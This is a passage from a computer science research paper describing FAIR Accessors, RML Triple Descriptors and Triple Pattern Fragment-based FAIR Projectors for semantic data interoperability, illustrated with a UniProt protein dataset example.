individual disease registries, which is then incorporated into a ‘‘disease matrix’’. The disease matrix provides aggregate data about what disease variants are in the registry, how many individuals represent each disease, and other high-level descriptive data that allows, for example, researchers to determine if they should approach the registry to request full data access. Finally, it was important that the data host/provider is not necessarily a participant in making their data interoperable—rather, the interoperability solution should be capable of adapting existing data with or without the source provider’s participation. This ensures that the interoperability objectives can be pursued for projects with limited resourcing, that ‘abandoned’ datasets may still participate in the interoperability framework, but most importantly, that those with the needs and the resources should adopt the responsibility for making their data-of-interest interoperable, even if it is not owned by them. This distributes Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 6/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 the problem of migrating data to interoperable formats over the maximum number of stakeholders, and ensures that the most crucial resources—those with the most demand for interoperability—become the earliest targets for migration. With these considerations in mind, we were inspired by three existing technologies whose features were used in a novel combination to create an interoperability infrastructure for both data and metadata, that is intended to also addresses the full range of FAIR requirements. Briefly, the selected technologies are: (1) The W3C’s Linked Data Platform (Speicher, Arwe & Malhotra, 2015). We generated a model for hierarchical dataset containers that is inspired by the concept of a Linked Data Platform (LDP) Container, and the LDP’s use of the Data Catalogue Vocabulary (DCAT, Maali, Erickson & Archer, 2014) for describing datasets, data elements, and distributions of those data elements. We also adopt the DCAT’s use of Simple Knowledge Organization System (SKOS, Miles & Bechhofer, 2009) Concept Schemes as a way to ontologically describe the content of a dataset or data record. (2) The RDF MappingLanguage (RML, Dimou et al., 2014). RML allows us to describe one or more possible RDF representations for any given dataset, and do so in a manner that is, itself, FAIR: every sub-component of an RML model is Findable, Accessible, Interoperable, and Reusable. Moreover, for many common semi-structured data, there are generic tools that utilize RML models to dynamically drive the transformation of data from these opaque representations into interoperable representations (https://github.com/RMLio/RML-Mapper). (3) Triple Pattern Fragments (TPF—Verborgh et al., 2016). A TPF interface is a REST Web API to retrieve RDF data from data sources in any native format. A TPF server accepts URLs that represent triple patterns [Subject, Predicate, Object], where any of these three elements may be constant or variable, and returns RDF triples from its data source that match those patterns. Such patterns can be used to obtain entire datasets, slices through datasets, or individual data points even down to a single triple (essentially a single cell in a spreadsheet table). Instead of relying on a standardized contract between servers and clients, a TPF interface is self-describing such that automated clients can discover the interface and its data. We will now describe in detail how we have applied key features of these technologies, in combination, to provide a novel data discoverability architecture. We will later demonstrate that this combination of technologies also enables both metadata and data-level interoperability even between opaque objects such as flat-files, allowing the data within these objects to be queried in parallel with other data on the Semantic Web. Metadata interoperability—the “FAIR Accessor” and the linked data platform The Linked Data Platform ‘‘defines a set of rules for HTTP operations on Web resources...to provide an architecture for read-write Linked Data on the Web’’ (https://www.w3.org/TR/ ldp/). All entities and concepts are identified by URLs, with machine-readable metadata describing the function or purpose of each URL and the nature of the resource that will be returned when that URL is resolved. Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 7/34 https://peerj.com https://github.com/RMLio/RML-Mapper https://www.w3.org/TR/ldp/ https://www.w3.org/TR/ldp/ http://dx.doi.org/10.7717/peerj-cs.110 Figure 1 The two layers of the FAIR Accessor. Inspired by the LDP Container, there are two resources in the FAIR Accessor. The first resource is a Container, which responds to an HTTP GET request by providing FAIR metadata about a composite research object, and optionally a list of URLs representing MetaRecords that describe individual components within the collection. The MetaRecord resources resolve by HTTP GET to documents containing metadata about an individual data component and, optionally, a set of links structured as DCAT Distributions that lead to various representations of that data. Within theLDPspecification is theconcept ofan LDPContainer. A basicimplementation of LDP containers involves two ‘‘kinds’’ of resources, as diagrammed in Fig. 1. The first type of resource represents the container—a metadata document that describes the shared features of a collection of resources, and (optionally) the membership of that collection. This is analogous to, for example, a metadata document describing a data repository, where the repository itself has features (ownership, curation policy, etc.) that are independent from the individual data records within that repository (i.e., the members of the collection). The second type of resource describes a member of the contained collection and (optionally) provides ways to access the record itself. Our implementation, which we refer to as the ‘‘FAIR Accessor’’, utilizes the container concept described by the LDP, however, it does not require a full implementation of LDP, as we only require read functionality. In addition, other requirements of LDP would Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 8/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 have added complexity without notable benefit. Our implementation, therefore, has two resource types based on the LDP Container described above, with the following specific features: Container resource: This is a composite research object (of any kind - repository, repository-record, database, dataset, data-slice, workflow, etc.). Its representation could include scope or knowledge-domain covered, authorship/ownership of the object, latest update, version number, curation policy, and so forth. This metadata may or may not include URLs representing MetaRecord resources (described below) that comprise the individual elements within the composite object. Notably, the Container URL provides a resolvable identifier independent from the identifier of the dataset being described; in fact, the dataset may not have an identifier, as would be the case, for example, where the container represents a dynamically-generated data-slice. In addition, Containers may be published by anyone—that is, the publisher of a Container may be independent from the publisher of the research object it is describing. This enables one of the objectives of our interoperability layer implementation—that anyone can publish metadata about any research object, thus making those objects more FAIR. MetaRecord resource: This is a specific element within a collection (data point, record, study, service, etc.). Its representation should include information regarding licensing and accessibility, access protocols, rich citation information, and other descriptive metadata. It also includes a reference to the container(s) of which it is a member (the Container URL). Finally, the MetaRecord may include further URLs that provide direct access to the data itself, with an explicit reference to the associated data format by its MIME type (e.g., text/html, application/json, application/vnd.ms-excel, text/csv, etc.). This is achieved using constructs from the Data Catalogue Vocabulary (DCAT; W3C, 2014), which defines the concept of a data ‘‘Distribution’’, which includes metadata facets such as the data source URL and its format. The lower part of Fig. 1 diagrams how multiple DCAT Distributions may be a part of a single MetaRecord. As with Container resources, MetaRecords may be published by anyone, and independently of the original data publisher. In summary, the FAIR Accessor shares commonalities with the Linked Data Platform, but additionally recommends the inclusion of rich contextual metadata, based on the FAIR Principles, that facilitate discovery and interoperability of repository and record- level information. The FAIR Accessor is read-only, utilizing only HTTP GET together with widely-used semantic frameworks to guide both human and machine exploration. Importantly, the lack of a novel API means that the information is accessible to generic Web- crawling agents, and may also be processed if that agent ‘‘understands’’ the vocabularies used. Thus, in simplistic terms, the Accessor can be envisioned as a series of Web pages, each containing metadata, and hyperlinks to more detailed metadata and/or data, where the metadata elements and relationships between the pages are explicitly explained to Web crawlers. To help clarify this component prior to presenting the more complex components of our interoperability proposal, we will now explore our first use case—data self- archival. A simple FAIR Accessor has been published online (Rodriguez Iglesias et al., 2016) in the Zenodo general-purpose repository. The data self-archival in this citation Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 9/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 represents a scenario similar to the polyadenylation use-case described in the Introduction section. In this case, the data describes the evolutionary conservation of components of the RNA Metabolism pathway in fungi as a series of heatmap images. The data deposit, includes a file ‘RNAME_Accessor.rdf’ which acts as the Container Resource. This document includes metadata about the deposit (authorship, topic, etc.), together with a series of ‘contains’ relationships, referring to MetaRecords inside of the file ‘RNAME_Accessor_Metarecords.rdf’. Each MetaRecord is about one of the heatmaps, and in addition to metadata about the image, includes a link to the associated image (datatype image/png) and a link to an RDF representation of the same information represented by that image (datatype application/rdf+xml). It should be noted that much of the content of those Accessor files was created using a text editor, based on template RDF documents. The structure of these two documents are described in more detail in the Results section, which includes a full walk-through of a more complex exemplar Accessor. At the metadata level, therefore, this portion of the interoperability architecture provides a high degree of FAIRness by allowing machines to discover and interpret useful metadata, and link it with the associated data deposits, even in the case of a repository that provides no FAIR-support. Nevertheless, these components do not significantly enhance the FAIRness and interoperability of the data itself, which was a key goal for this project. We will now describe the application of two recently-published Web technologies—Triple Pattern Fragments and RML—to the problem of data-level interoperability. We will show that these two technologies can be combined to provide an API-free common interface that may be used to serve, in a machine-readable way, FAIR data transformations (either from non-FAIR data, or transformations of FAIR data into novel ontological frameworks). We will also demonstrate how this FAIR data republishing layer can be integrated into the FAIR Accessor to provide a machine-traversable path for incremental drill-down from high-level repository metadata all the way through to individual data points within a record, and back. Data interoperability: discovery of compatible data through RML-based FAIR profiles In our approach to data-level interoperability, we first identified a number of desiderata that the solution should exhibit: 1. View-harmonization over dissimilar datatypes, allowing discovery of potentially integrable data within non-integrable formats. 2. Support for a multitude of source data formats (XML, Excel, CSV, JSON, binary, etc.) 3. ‘‘Cell-level’’ discovery and interoperability (referring to a ‘‘cell’’ in a spreadsheet) 4. Modularity, such that a user can make interoperable only the data component of- interest to them 5. Reusability, avoiding ‘‘one-solution-per-record’’ and minimizing effort/waste 6. Must use standard technologies, and reuse existing vocabularies 7. Should not require the participation of the data host (for public data). The approach we selected was based on the premise that data, in any format, could be metamodelled as a first step towards interoperability; i.e., the salient data-types and Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 10/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 relationships within an opaque data ‘‘blob’’ could be described in a machine-readable manner. The metamodels of two data sources could then be compared to determine if their contained data was, in principle, integrable. We referred to these metamodels as ‘‘FAIR Profiles’’, and we further noted that we should support multiple metamodels of the same data, differing in structure or ontological/semantic framework, within a FAIR Profile. For example, a data record containing blood pressure information might have a FAIR Profile where this facet is modelled using both the SNOMED vocabulary and the ICD10 vocabulary, since the data facet can be understood using either. We acknowledge that these meta-modelling concepts are not novel, and have been suggested by a variety of other projects such as DCAT and Dublin Core (the DC Application Profile (Heery & Patel, 2000)), and have been extensively described by the ISO 11179 standard for ‘‘metadata registries’’. It was then necessary to select a modelling framework for FAIR Profiles capable of representing arbitrary, and possibly redundant, semantic models. Our investigation into relevant existing technologies and implementations revealed a relatively new, unofficial specification for a generic mapping language called ‘‘RDF Mapping Language’’ (RML Dimou et al., 2014). RML is an extension of R2RML (Das, Sundara & Cyganiak, 2012), a W3C Recommendation for mapping relational databases to RDF, and is described as ‘‘a uniform mapping formalization for data in different format, which [enables] reuse and exchange between tools and applied data’’ (Dimou et al., 2014). An RML map describes the triple structure (subject, predicate, object, abbreviated as [S,P,O]), the semantic types of the subject and object, and their constituent URI structures, that would result from a transformation of non-RDF data (of any kind) into RDF data. RML maps are modular documents where each component describes the schema for a single-resource-centric graph (i.e., a graph with all triples that share the same subject). The ‘‘object’’ position in each of these map modules may be mapped to a literal, or may be mapped to another RML module, thus allowing linkages between maps in much the same way that the object of an RDF triple may become the subject of another triple. RML modules therefore may then be assembled into a complete map representing both the structure and the semantics of an RDF representation of a data source. RML maps themselves take the form of RDF documents, and can be published on the Web, discovered, and reused, via standard Web technologies and protocols. RML therefore fulfils each of the desiderata for FAIR Profiles, and as such, we selected this technology as the candidate for their implementation. Comparing with related technologies, this portion of our interoperability prototype serves a similar purpose to the XML Schema (XSD; Fallside & Walmsley, 2004) definitions within the output component of a Web Services Description Language (WSDL) document, but unlike XSD, is capable of describing the structure and semantics of RDF graphs. Of particular interest to us was the modularity of RML—its ability to model individual triples. This speaks directly to our desiderata 4, where we do not wish to require (and should not expect) a modeller to invest the time and effort required to fully model every facet of a potentially very complex dataset. Far more often, individuals will have an interest in only one or a few facets of a dataset. As such, we chose to utilize RML models at their Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 11/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 Figure 2 Diagram of the structure of an exemplar Triple Descriptor representing a hypothetical record of a SNP in a patient’s genome. In this descriptor, the Subject will have the URL structure http://example.org/patient/{id}, and the Subject is of type PatientRecord. The Predicate is hasVariant, and the Object will have URL structure http://identifiers.org/dbsnp/{snp} with the rdf:type from the sequence ontology ‘‘0000694’’ (which is the concept of a ‘‘SNP’’). The two nodes shaded green are of the same ontological type, showing the iterative nature of RML, and how individual RML Triple Descriptors will be concatenated into full FAIR Profiles. The three nodes shaded yellow are the nodes that define the subject type, predicate and object type of the triple being described. highest level of granularity—that is, we require a distinct RML model for each triple pattern (subject+type, predicate, object+type) of interest. We call these small RML models ’’Triple Descriptors’’. An exemplar Triple Descriptor is diagrammed in Fig. 2. There may be many Triple Descriptors associated with a single data resource. Moreover, multiple Triple Descriptors may model the same facet within that data resource, using different URI structures, subject/object semantic types, or predicates, thus acting as different ‘‘views’’ of that data facet. Finally, then, the aggregation of all Triple Descriptors associated with a specific data resource produces a FAIR Profile of that data. Note that FAIR Profiles are not necessarily comprehensive; however, by aggregating the efforts of all modellers, FAIR Profiles model only the data facets that are most important to the community. FAIR Profiles enable view harmonization over compatible but structurally non- integrable data, possibly in distinct repositories. The Profiles of one data resource can Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 12/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 be compared to the Profiles of another data resource to identify commonalities between their Triple Descriptors at the semantic level, even if the underlying data is semantically opaque and/or structurally distinct—a key step toward Interoperability. FAIR Profiles, therefore, have utility, independent of any actuated transformation of the underlying data, in that they facilitate compatible data discovery. Moreover, with respect to desiderata 5, Triple Descriptors, and sometimes entire FAIR Profiles, are RDF documents published on the Web, and therefore may be reused to describe new data resources, anywhere on the Web, that contain similar data elements, regardless of the native representation of that new resource, further simplifying the goal of data harmonization. Data interoperability: data transformation with FAIR projectors and triple pattern fragments The ability to identify potentially integrable data within opaque file formats is, itself, a notable achievement compared to the status quo. Nevertheless, beyond just discovery of relevant data, our interoperability layer aims to support and facilitate cross-resource data integration and query answering. This requires that the data is not only semantically described, but is also semantically and syntactically transformed into a common structure. Having just presented a mechanism to describe the structure and semantics of data— Triple Descriptors in RML—what remains lacking is a way to retrieve data consistent with those Triple Descriptors. We require a means to expose transformed data without worsening the existing critical barrier to interoperability—opaque, non-machine-readable interfaces and API proliferation (Verborgh & Dumontier, 2016). What is required is a universally-applicable way of retrieving data generated by a (user-defined) data extraction or transformation process, that does not result in yet another API. The Triple Pattern Fragments (TPF) specification (Verborgh et al., 2016) defines a REST interface for publishing triples. The server receives HTTP GET calls on URLs that contain a triple pattern [S,P,O], where any component of that pattern is either a constant or a variable. In response, a TPF server returns pages with all triples from its data source that match the incoming pattern. As such, any given triple pattern has a distinct URL. We propose, therefore, to combine three elements—data transformed into RDF, which is described by Triple Descriptors, and served via TPF-compliant URLs. We call this combination of technologies a ’’FAIR Projector’’. A FAIR Projector, therefore, is a Web resource (i.e., something identified by a URL) that is associated with both a particular data source, and a particular Triple Descriptor. Calling HTTP GET on the URL of the FAIR Projector produces RDF triples from the data source that match the format defined by that Projector’s Triple Descriptor. The originating data source behind a Projector may be a database, a data transformation script, an analytical web service, another FAIR Projector, or any other static or dynamic data-source. Note that we do not include a transformation methodology in this proposal; however, we address this issue and provide suggestions in the Discussion section. There may, of course, be multiple projectors associated with any given data source, serving a variety of triples representing different facets of that data. Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 13/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 Linking the components: FAIR projectors and the FAIR accessor At this point, we have a means for requesting triples with a particular structure—TPF Servers—and we have a means of describing the structure and semantics of those triples— Triple Descriptors. Together with a source of RDF data, these define a FAIR Projector. However, we still lack a formal mechanism for linking TPF-compliant URLs with their associated Triple Descriptors, such that the discovery of a Triple Descriptor with the desired semantics for a particular data resource, also provides its associated Projector URL. We propose that this association can be accomplished, without defining any novel API or standard, if the output of a FAIR Projector is considered a DCAT Distribution of a particular data source, and included within the MetaRecord of a FAIR Accessor. The URL of the Projector, and its Triple Descriptor, become metadata facets of a new dcat:Distribution element in the MetaRecord. This is diagrammed in Fig. 3, where Distribution_3 and Distribution_4 include Triple Pattern Fragment-formatted URLs representing the FAIR Projector, and the Triple Descriptor RML model describing the structure and semantics of the data returned by calling that Projector. Thus, all components of this interoperability system—from the top level repository metadata, to the individual data cell—are now associated with one another in a manner that allows mechanized data discovery, harmonization, and retrieval, including relevant citation information. No novel technology or API was required, thus allowing this rich combination of data and metadata to be explored using existing Web tools and crawlers. RESULTS In the previous section, we provided the URL to a simple exemplar FAIR Accessor published on Zenodo. To demonstrate the interoperability system in its entirety—including both the Accessor and the Projector components—we will now proceed through a second exemplar involving the special-purpose repository for protein sequence information, UniProt. In this example, we examine a FAIR Accessor to a dataset, created through a database query, that consists of a specific ‘‘slice’’ of the Protein records within the UniProt database—that is, the set of proteins in Aspergillus nidulans FGSC A4 (NCBI Taxonomy ID 227321) that are annotated as being involved in mRNA Processing (Gene Ontology Accession GO:0006397). We first demonstrate the functionality of the two layers of the FAIR Accessor in detail. We then demonstrate a FAIR Projector, and show how its metadata integrates into the FAIR Accessor. In this example, the Projector modifies the ontological framework of the UniProt data such that the ontological terms used by UniProt are replaced by the terms specified in EDAM—an ontology of bioinformatics operations, datatypes, and formats (Ison et al., 2013). We will demonstrate that this transformation is specified, in a machine-readable way, by the FAIR Triple Descriptor that accompanies each Projector’s metadata. The two-step FAIR accessor The example FAIR Accessor accesses a database of RDF hosted by UniProt, and issues the following query over that database (expressed in the standard RDF query language SPARQL): Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 14/34 https://peerj.com https://www.ncbi.nlm.nih.gov/Taxonomy/Browser/wwwtax.cgi?mode=Info&id=227321 http://www.ebi.ac.uk/QuickGO/GTerm?id=GO:0006397 http://dx.doi.org/10.7717/peerj-cs.110 Figure 3 Integration of FAIR Projectors into the FAIR Accessor. Resolving the MetaRecord resource returns a metadata document containing multiple DCAT Distributions for a given record, as in Fig. 1. When a FAIR Projector is available, additional DCAT Distributions are included in this metadata docu- ment. These Distributions contain a URL (purple text) representing a Projector, and a Triple Descriptor that describes, in RML, the structure and semantics of the Triple(s) that will be obtained from that Projec- tor resource if it is resolved. These Triple Descriptors may be aggregated into FAIR Profiles, based on the Record that they are associated with (Record R, in the figure) to give a full mapping of all available repre- sentations of the data present in Record R. PREFIX up: PREFIX taxon: PREFIX rdf: PREFIX GO: SELECT DISTINCT ?id WHERE { ?protein a up:Protein ; up:organism taxon:227321 ; up:classifiedWith/rdfs:subClassOf GO:0006397 . Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 15/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 BIND(substr(str(?protein), 33) as ?id) } Accessor output is retrieved from the Container Resource URL: http://linkeddata.systems/Accessors/UniProtAccessor The result of calling GET on the Container Resource URL is visualized in Fig. 4, where Tabulator (Berners-Lee et al., 2006) is used to render the output as HTML for human-readability. Of particular note are the following metadata elements: http://purl.org/dc/elements/1.1/license https://creativecommons.org/licenses/by-nd/4.0/ http://purl.org/pav/authoredBy http://orcid.org/0000-0002-9699-485X http://rdfs.org/ns/void#entities 82 a http://purl.org/dc/dcmitype/Dataset http://www.w3.org/ns/ldp#BasicContainer http://www.w3.org/ns/prov#Collection http://www.w3.org/ns/dcat#contactPoint http://biordf.org/DataFairPort/MiscRDF/Wilkinson.rdf http://www.w3.org/ns/dcat#keyword ‘‘Aspergillus nidulans’’, ‘‘Aspergillus’’, ‘‘Proteins’’, ‘‘RNA Processing’’; http://www.w3.org/ns/dcat#theme http://linkeddata.systems/ConceptSchemes/RNA_ Processing_conceptscheme.rdf http://www.w3.org/ns/ldp#contains http://linkeddata.systems/cgi-bin/Accessors/ UniProtAccessor/C8VIL6 http://linkeddata.systems/cgi-bin/Accessors/ UniProtAccessor/C8V2B3 ... • License information is provided as an HTML + RDFa document, following one of the primary standard license forms published by Creative Commons. This allows the license to be unambiguously interpreted by both machines and people prior to accessing any data elements, an important feature that will be discussed later. • Authorship is provided by name, using the Academic Research Project Funding Ontology (ARPFO), but is also unambiguously provided by a link to the author’s ORCID, using the Provenance Authoring and Versioning (PAV; Ciccarese et al., 2013) ontology. • The repository descriptor is typed as being a Dublin Core Dataset, a Linked Data Platform container, and a Provenance Collection, allowing it to be interpreted by a variety of client agents, and conforming to several best-practices, such as the Healthcare and Life Science Dataset Description guidelines (Gray et al., 2015; Dumontier et al., 2016). Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 16/34 https://peerj.com http://purl.org/dc/elements/1.1/license https://creativecommons.org/licenses/by-nd/4.0/ http://purl.org/pav/authoredBy http://orcid.org/0000-0002-9699-485X http://rdfs.org/ns/void#entities http://purl.org/dc/dcmitype/Dataset http://www.w3.org/ns/ldp#BasicContainer http://www.w3.org/ns/prov#Collection http://www.w3.org/ns/dcat#contactPoint http://biordf.org/DataFairPort/MiscRDF/Wilkinson.rdf http://www.w3.org/ns/dcat#keyword http://www.w3.org/ns/dcat#theme http://linkeddata.systems/ConceptSchemes/RNA_Processing_conceptscheme.rdf http://linkeddata.systems/ConceptSchemes/RNA_Processing_conceptscheme.rdf http://www.w3.org/ns/ldp#contains http://linkeddata.systems/cgi-bin/Accessors/UniProtAccessor/C8VIL6 http://linkeddata.systems/cgi-bin/Accessors/UniProtAccessor/C8VIL6 http://linkeddata.systems/cgi-bin/Accessors/UniProtAccessor/C8V2B3 http://linkeddata.systems/cgi-bin/Accessors/UniProtAccessor/C8V2B3 http://dx.doi.org/10.7717/peerj-cs.110 Figure 4 A representative portion of the output from resolving the Container Resource of the FAIR Accessor, rendered into HTML by the Tabulator Firefox plugin. The three columns show the label of the Subject node of all RDF Triples (left), the label of the URI in the predicate position of each Triple (mid- dle), and the value of the Object position (right), where blue text indicates that the value is a Resource, and black text indicates that the value is a literal. • Contact information is provided in a machine-readable manner via the Friend of a Friend (FoaF) record of the author, and the DCAT ontology ‘‘contactPoint’’ property. • Human readable keywords, using DCAT, are mirrored and/or enhanced by a machine- readable RDF document which is the value of the DCAT ‘‘theme’’ property. This RDF document follows the structure determined by the Simple Knowledge Organization System (SKOS) ontology, and lists the ontological terms that describe the repository for machine-processing. • Finally, individual records within the dataset are represented as the value of the Linked Data Platform ‘‘contains’’ property, and provided as a possibly paginated list of URLs (a discussion of machine-actionable pagination will not be included here). These URLs are the MetaRecord Resource URLs shown in Fig. 1. Following the flow in Fig. 1, the next step in the FAIR Accessor is to resolve a MetaRecord Resource URL. For clarity, we will first show the metadata document that is returned if Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 17/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 Figure 5 A representative (incomplete) portion of the output from resolving the MetaRecord Resource of the FAIR Accessor for record C8V1L6 (at http://linkeddata.systems/Accessors/UniProtAccessor/ C8V1L6), rendered into HTML by the Tabulator Firefox plugin. The columns have the same meaning as in Fig. 4. there are no FAIR Projectors for that dataset. This will be similar to the document returned by calling a FAIR MetaRecord URL in the Zenodo use case discussed in the earlier Methods section. Calling HTTP GET on a MetaRecord Resource URL returns a document that include metadata elements and structure shown in Fig. 5. Note that Fig. 5 is not the complete MetaRecord; rather it has been edited to include only those elements relevant to the aspects of the interoperability infrastructure that have been discussed so far. More complete examples of the MetaRecord RDF, including the elements describing a Projector, are described in Figs. 6–9. Many properties in this metadata document are similar to those at the higher level of the FAIR Accessor. Notably, however, the primary topic of this document is the UniProt record, indicating a shift in the focus of the document from the provider of the Accessor to the provider of the originating Data. Therefore, the values of these facets now reflect the authorship and contact information for that record. We do, recognize that MetaRecords are themselves scholarly works and should be properly cited. The MetaRecord includes the ‘‘in dataset’’ predicate, which refers back to the first level of the FAIR Accessor, thus this provides one avenue for capturing the provenance information for the MetaRecord. If additional provenance detail is required, we propose (but no not describe further here) Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 18/34 https://peerj.com http://linkeddata.systems/Accessors/UniProtAccessor/C8V1L6 http://linkeddata.systems/Accessors/UniProtAccessor/C8V1L6 http://dx.doi.org/10.7717/peerj-cs.110 @prefix dc: . @prefix dcat: . @prefix Uni: . Uni:C8V1L6 dcat:distribution <#DistributionD7566F52-C143-11E6-897C-26245D07C3DD>, <#DistributionD75682F8-C143-11E6-897C-26245D07C3DD>; <#DistributionD7566F52-C143-11E6-897C-26245D07C3DD> dc:format "text/html"; a dc:Dataset, dcat:Distribution; dcat:downloadURL . <#DistributionD75682F8-C143-11E6-897C-26245D07C3DD> dc:format "application/rdf+xml"; a dc:Dataset, void:Dataset, dcat:Distribution; dcat:downloadURL . Figure 6 Turtle representation of the subset of triples from the MetaRecord metadata pertaining to the two DCAT Distributions. Each distribution specifies an available representation (media type), and a URL from which that representation can be downloaded. Figure 7 A portion of the output from resolving the MetaRecord Resource of the FAIR Accessor for record C8UZX9, rendered into HTML by the Tabulator Firefox plugin. The columns have the same meaning as in Fig. 4. Comparing the structure of this document to that in Fig. 5 shows that there are now four values for the ‘‘distribution’’ predicate. An RDF and HTML representation, as in Fig. 5, and two addi- tional distributions with URLs conforming to the TPF design pattern (highlighted). Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 19/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 @prefix dc: . @prefix dcat: . @prefix rr: . @prefix ql: . @prefix rml: . @prefix Uni: . @prefix void: . @prefix Uni: . @prefix FAI: . @prefix core: . @prefix edam: . Uni:C8V1L6 dcat:distribution <#Distribution9EFD1238-C1F6-11E6-8812-3E445D07C3DD>, <#Distribution9EFD1238-C1F6-11E6-8812-3E445D07C3DD> dc:format "application/rdf+xml", "application/x-turtle", "text/html"; rml:hasMapping <#Mappings9EFD1238-C1F6-11E6-8812-3E445D07C3DD>; a FAI:Projector, dc:Dataset, void:Dataset, dcat:Distribution; dcat:downloadURL . <#Mappings9EFD1238-C1F6-11E6-8812-3E445D07C3DD> rr:subjectMap <#SubjectMap9EFD1238-C1F6-11E6-8812-3E445D07C3DD>. rr:predicateObjectMap <#POMap9EFD1238-C1F6-11E6-8812-3E445D07C3DD>; <#SubjectMap9EFD1238-C1F6-11E6-8812-3E445D07C3DD> rr:class edam:data_0896; rr:template "http://identifiers.org/uniprot/{ID}". <#POMap9EFD1238-C1F6-11E6-8812-3E445D07C3DD> rr:objectMap <#ObjectMap9EFD1238-C1F6-11E6-8812-3E445D07C3DD>; rr:predicate core:classifiedWith. <#ObjectMap9EFD1238-C1F6-11E6-8812-3E445D07C3DD> rr:parentTriplesMap <#SubjectMap29EFD1238-C1F6-11E6-8812-3E445D07C3DD>. <#SubjectMap29EFD1238-C1F6-11E6-8812-3E445D07C3DD> rr:class ed:data_1176; rr:template "http://identifiers.org/taxon/{TAX}". Figure 8 Turtle representation of the subset of triples from the MetaRecord metadata pertaining to one of the FAIR Projector DCAT Distributions of the MetaRecord shown in Fig. 7. The text is colour- coded to assist in visual exploration of the RDF. The DCAT Distribution blocks of the two Projector dis- tributions (black bold) have multiple media-type representations (red), and are connected to an RML Map (Dark blue) by the hasMapping predicate, which is a block of RML that semantically describes the subject, predicate, and object (green, orange, and purple respectively) of the Triple Descriptor for that Projector. This block of RML is schematically diagrammed in Fig. 2. The three media-types (red) indicate that the URL will respond to HTTP Content Negotiation, and may return any of those three formats. Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 20/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 In UniProt http://purl.uniprot.org/uniprot/C8UZX9 a http://purl.uniprot.org/core/Protein ; http://purl.uniprot.org/core/classifiedWith http://purl.obolibrary.org/obo/GO_0000462 . http://purl.obolibrary.org/obo/GO_0000462 a http://www.w3.org/2002/07/owl#Class After Projection http://identifiers.org/uniprot/C8UZX9 a http://edamontology.org/data_0896 ; http://purl.uniprot.org/core/classifiedWith http://purl.obolibrary.org/obo/GO_0000462 . http://purl.obolibrary.org/obo/GO_0000462 a http://edamontology.org/data_1176 Figure 9 Data before and after FAIR Projection. Bolded segments show how the URI structure and the semantics of the data were modified, according to the mapping defined in the Triple Descriptor (data_0896 = ‘‘Protein report’’ and data_1176 = ‘‘GO Concept ID’’). URI structure transformations may be useful for integrative queries against datasets that utilize the Identifiers.org URI scheme such as OpenLifeData (González et al., 2014). Semantic transformations allow integrative queries across datasets that utilize diverse and redundant ontologies for describing their data, and in this example, may also be used to add semantics where there were none before. that this information could be contained in a separate named graph, in a manner akin to that used by NanoPublications (Kuhn et al., 2016). The important distinctive property in this document is the ‘‘distribution’’ property, from the DCAT ontology. For clarity, an abbreviated document in Turtle format is shown in Fig. 6, containing only the ‘‘distribution’’ elements and their values. There are two DCAT Distributions in this document. The first is described as being in format ‘‘application/rdf+xml’’, with its associated download URL. The second is described as being in format ‘‘text/html’’, again with the correct URL for that representation. Both are typed as Distributions from the DCAT ontology. These distributions are published by UniProt themselves, and the UniProt URLs are used. Additional metadata in the FAIR Accessor (not shown in Fig. 6) describes the keywords that relate to that record in both machine and human-readable formats, access policy, and license, allowing machines to more accurately determine the utility of this record prior to retrieving it. Several things are important to note before moving to a discussion of FAIR Projectors. First, the two levels of the FAIR Accessor are not interdependent. The Container layer can describe relevant information about the scope and nature of a repository, but might not provide any further links to MetaRecords. Similarly, whether or not to provide a distribution within a MetaRecord is entirely at the discretion of the data owner. For sensitive data, an owner may chose to simply provide (even limited) metadata, but not provide any direct link to the data itself, and this is perfectly conformant with the FAIR guidelines. Further, when publishing a single data record, it is not obligatory to publish the Wilkinson et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.110 21/34 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.110 Container level of the FAIR Accessor; one could simply provide the MetaRecord document describing that data file, together with an optional link to that file as a Distribution. Finally, it is also possible to publish containers of containers, to any depth, if such is required to describe a multi-resource scenario (e.g., an institution hosting multiple distinct databases). The FAIR projector FAIR Projectors can be used for many purposes, including (but not limited to) publishing transformed Linked Data from non-Linked Data; publishing transformed data from a Linked Data source into a distinct structure or ontological framework; load-management/query-management; or as a means to explicitly describe the ontological structure of an underlying data source in a searchable manner. In this demonstration, the FAIR Projector publishes dynamically transformed data, where the transformation involves altering the semantics of RDF provided by UniProt into a different ontological framework (EDAM). This FAIR Projector’s TPF interface is available at: http://linkeddata.systems:3001/fragments Data exposed as a TPF-compliant Resource require a subject and/or predicate and/or object value to be specified in the URL; a request for the all-variable pattern (blank, as above) will return nothing. How can a software agent know what URLs are valid, and what 